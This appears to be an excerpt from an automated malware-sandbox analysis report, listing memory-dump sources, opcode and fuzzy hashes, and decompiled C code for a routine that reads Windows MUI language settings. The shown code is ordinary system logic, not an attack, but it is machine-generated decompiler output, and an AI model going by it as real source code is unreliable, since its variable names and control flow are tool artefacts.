                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                        • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                                                                                                                        • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                                                                                                                        • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008C0C40, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                        • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                                                                        • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                                                                        • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008C1D80, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                        • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                                                                                                                        • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                                                                                                                        • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFD5C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                        • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                                                                                                                        • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                                                                                                                        • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFE24, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                        • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                                                                                                                        • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                                                                                                                        • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFFFC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                        • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                                                                                                                        • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                                                                                                                        • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008BFF34, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                        • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                                                                                                                        • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                                                                                                                        • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008E8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                        			E008E8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E008E8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008CE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E008E718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E008E8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E008E718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E008E8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E008E8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E008E8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E008E718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008C2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008DE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008CE2A8(_t322,  &_v68, _v16);
								if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008DE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008CE2A8(_t322,  &_v68, _t236);
								if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E008E718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008C2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008DE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008CE2A8(_v12,  &_v68, _v16);
							if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008DE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008CE2A8(_t322,  &_v68, _t269);
							if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E008E718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008C2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008DE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008CE2A8(_v12,  &_v68, _v16);
						if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008DE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008CE2A8(_t322,  &_v68, _t296);
						if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                        0x008e8788
                                                                                                                                                        0x008e8788
                                                                                                                                                        0x008e8791
                                                                                                                                                        0x008e8794
                                                                                                                                                        0x008e8798
                                                                                                                                                        0x008e879b
                                                                                                                                                        0x008e879e
                                                                                                                                                        0x008e87a1
                                                                                                                                                        0x008e87a4
                                                                                                                                                        0x008e87a7
                                                                                                                                                        0x008e87aa
                                                                                                                                                        0x008e87af
                                                                                                                                                        0x00931ad3
                                                                                                                                                        0x008e8b0a
                                                                                                                                                        0x008e8b0d
                                                                                                                                                        0x008e8b13
                                                                                                                                                        0x008e8b19
                                                                                                                                                        0x008e8b1f
                                                                                                                                                        0x008e8b25
                                                                                                                                                        0x008e8b2b
                                                                                                                                                        0x008e8b31
                                                                                                                                                        0x008e8b37
                                                                                                                                                        0x008e8b3d
                                                                                                                                                        0x008e8b46
                                                                                                                                                        0x008e8b46
                                                                                                                                                        0x008e87c6
                                                                                                                                                        0x008e87d0
                                                                                                                                                        0x00931ae0
                                                                                                                                                        0x00931ae6
                                                                                                                                                        0x00931af8
                                                                                                                                                        0x00931af8
                                                                                                                                                        0x00931afd
                                                                                                                                                        0x00931afe
                                                                                                                                                        0x00931b01
                                                                                                                                                        0x00931b06
                                                                                                                                                        0x00931b06
                                                                                                                                                        0x008e87d6
                                                                                                                                                        0x008e87f2
                                                                                                                                                        0x008e87f7
                                                                                                                                                        0x008e8807
                                                                                                                                                        0x008e880a
                                                                                                                                                        0x008e880f
                                                                                                                                                        0x008e8810
                                                                                                                                                        0x008e8813
                                                                                                                                                        0x008e8818
                                                                                                                                                        0x008e8818
                                                                                                                                                        0x008e882c
                                                                                                                                                        0x008e8831
                                                                                                                                                        0x008e8838
                                                                                                                                                        0x008e8908
                                                                                                                                                        0x008e8920
                                                                                                                                                        0x008e89f0
                                                                                                                                                        0x008e8a08
                                                                                                                                                        0x008e8af6
                                                                                                                                                        0x008e8af6
                                                                                                                                                        0x008e8af8
                                                                                                                                                        0x008e8afb
                                                                                                                                                        0x00931beb
                                                                                                                                                        0x00931beb
                                                                                                                                                        0x008e8b04
                                                                                                                                                        0x00931bf8
                                                                                                                                                        0x00931c0e
                                                                                                                                                        0x00931c13
                                                                                                                                                        0x00931c16
                                                                                                                                                        0x00931c16
                                                                                                                                                        0x00931bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8b04
                                                                                                                                                        0x008e8a0e
                                                                                                                                                        0x008e8a11
                                                                                                                                                        0x008e8a14
                                                                                                                                                        0x008e8a15
                                                                                                                                                        0x008e8a18
                                                                                                                                                        0x008e8a22
                                                                                                                                                        0x008e8b59
                                                                                                                                                        0x008e8a28
                                                                                                                                                        0x008e8a3c
                                                                                                                                                        0x008e8a3c
                                                                                                                                                        0x008e8a42
                                                                                                                                                        0x00931bb0
                                                                                                                                                        0x00931b11
                                                                                                                                                        0x00931b11
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8a48
                                                                                                                                                        0x008e8a51
                                                                                                                                                        0x008e8a5b
                                                                                                                                                        0x008e8a5e
                                                                                                                                                        0x008e8a61
                                                                                                                                                        0x008e8a69
                                                                                                                                                        0x008e8a69
                                                                                                                                                        0x008e8a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8a74
                                                                                                                                                        0x008e8a7c
                                                                                                                                                        0x008e8a7d
                                                                                                                                                        0x008e8a91
                                                                                                                                                        0x008e8a93
                                                                                                                                                        0x008e8a93
                                                                                                                                                        0x008e8a98
                                                                                                                                                        0x008e8a9b
                                                                                                                                                        0x008e8aa1
                                                                                                                                                        0x008e8aa1
                                                                                                                                                        0x008e8aa4
                                                                                                                                                        0x008e8aaa
                                                                                                                                                        0x008e8ab1
                                                                                                                                                        0x008e8ac5
                                                                                                                                                        0x008e8ac7
                                                                                                                                                        0x008e8ac7
                                                                                                                                                        0x008e8ac5
                                                                                                                                                        0x008e8ace
                                                                                                                                                        0x00931bc9
                                                                                                                                                        0x00931bce
                                                                                                                                                        0x00931bd2
                                                                                                                                                        0x00931bd2
                                                                                                                                                        0x008e8ad8
                                                                                                                                                        0x008e8aeb
                                                                                                                                                        0x008e8aeb
                                                                                                                                                        0x008e8af0
                                                                                                                                                        0x008e8af4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8af4
                                                                                                                                                        0x008e8a42
                                                                                                                                                        0x008e8926
                                                                                                                                                        0x008e8929
                                                                                                                                                        0x008e892c
                                                                                                                                                        0x008e892d
                                                                                                                                                        0x008e8930
                                                                                                                                                        0x008e8935
                                                                                                                                                        0x008e893a
                                                                                                                                                        0x008e8b51
                                                                                                                                                        0x008e8940
                                                                                                                                                        0x008e8954
                                                                                                                                                        0x008e8954
                                                                                                                                                        0x008e895a
                                                                                                                                                        0x00931b63
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8960
                                                                                                                                                        0x008e8969
                                                                                                                                                        0x008e8973
                                                                                                                                                        0x008e8976
                                                                                                                                                        0x008e8979
                                                                                                                                                        0x008e897e
                                                                                                                                                        0x008e8981
                                                                                                                                                        0x008e8981
                                                                                                                                                        0x008e8986
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00931b6e
                                                                                                                                                        0x00931b74
                                                                                                                                                        0x00931b7b
                                                                                                                                                        0x00931b8f
                                                                                                                                                        0x00931b91
                                                                                                                                                        0x00931b91
                                                                                                                                                        0x00931b99
                                                                                                                                                        0x00931b9c
                                                                                                                                                        0x00931ba2
                                                                                                                                                        0x00931ba2
                                                                                                                                                        0x008e898c
                                                                                                                                                        0x008e8992
                                                                                                                                                        0x008e8999
                                                                                                                                                        0x008e89ad
                                                                                                                                                        0x00931ba8
                                                                                                                                                        0x00931ba8
                                                                                                                                                        0x008e89ad
                                                                                                                                                        0x008e89b6
                                                                                                                                                        0x008e89c8
                                                                                                                                                        0x008e89cd
                                                                                                                                                        0x008e89d0
                                                                                                                                                        0x008e89d0
                                                                                                                                                        0x008e89d6
                                                                                                                                                        0x008e89e8
                                                                                                                                                        0x008e89e8
                                                                                                                                                        0x008e89ed
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e89ed
                                                                                                                                                        0x008e895a
                                                                                                                                                        0x008e883e
                                                                                                                                                        0x008e8841
                                                                                                                                                        0x008e8844
                                                                                                                                                        0x008e8845
                                                                                                                                                        0x008e8848
                                                                                                                                                        0x008e884d
                                                                                                                                                        0x008e8852
                                                                                                                                                        0x008e8b49
                                                                                                                                                        0x008e8858
                                                                                                                                                        0x008e886c
                                                                                                                                                        0x008e886c
                                                                                                                                                        0x008e8872
                                                                                                                                                        0x00931b0e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8878
                                                                                                                                                        0x008e8881
                                                                                                                                                        0x008e888b
                                                                                                                                                        0x008e888e
                                                                                                                                                        0x008e8891
                                                                                                                                                        0x008e8896
                                                                                                                                                        0x008e8899
                                                                                                                                                        0x008e8899
                                                                                                                                                        0x008e889e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00931b21
                                                                                                                                                        0x00931b27
                                                                                                                                                        0x00931b2e
                                                                                                                                                        0x00931b42
                                                                                                                                                        0x00931b44
                                                                                                                                                        0x00931b44
                                                                                                                                                        0x00931b4c
                                                                                                                                                        0x00931b4f
                                                                                                                                                        0x00931b55
                                                                                                                                                        0x00931b55
                                                                                                                                                        0x008e88a4
                                                                                                                                                        0x008e88aa
                                                                                                                                                        0x008e88b1
                                                                                                                                                        0x008e88c5
                                                                                                                                                        0x00931b5b
                                                                                                                                                        0x00931b5b
                                                                                                                                                        0x008e88c5
                                                                                                                                                        0x008e88ce
                                                                                                                                                        0x008e88e0
                                                                                                                                                        0x008e88e5
                                                                                                                                                        0x008e88e8
                                                                                                                                                        0x008e88e8
                                                                                                                                                        0x008e88ee
                                                                                                                                                        0x008e8900
                                                                                                                                                        0x008e8900
                                                                                                                                                        0x008e8905
                                                                                                                                                        0x00000000
                                                                                                                                                        0x008e8905

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 008E8827
                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 008E87E6
                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 008E89FC
                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 008E8914
                                                                                                                                                        • WindowsExcludedProcs, xrefs: 008E87C1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcspbrk
                                                                                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                        • API String ID: 402402107-258546922
                                                                                                                                                        • Opcode ID: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
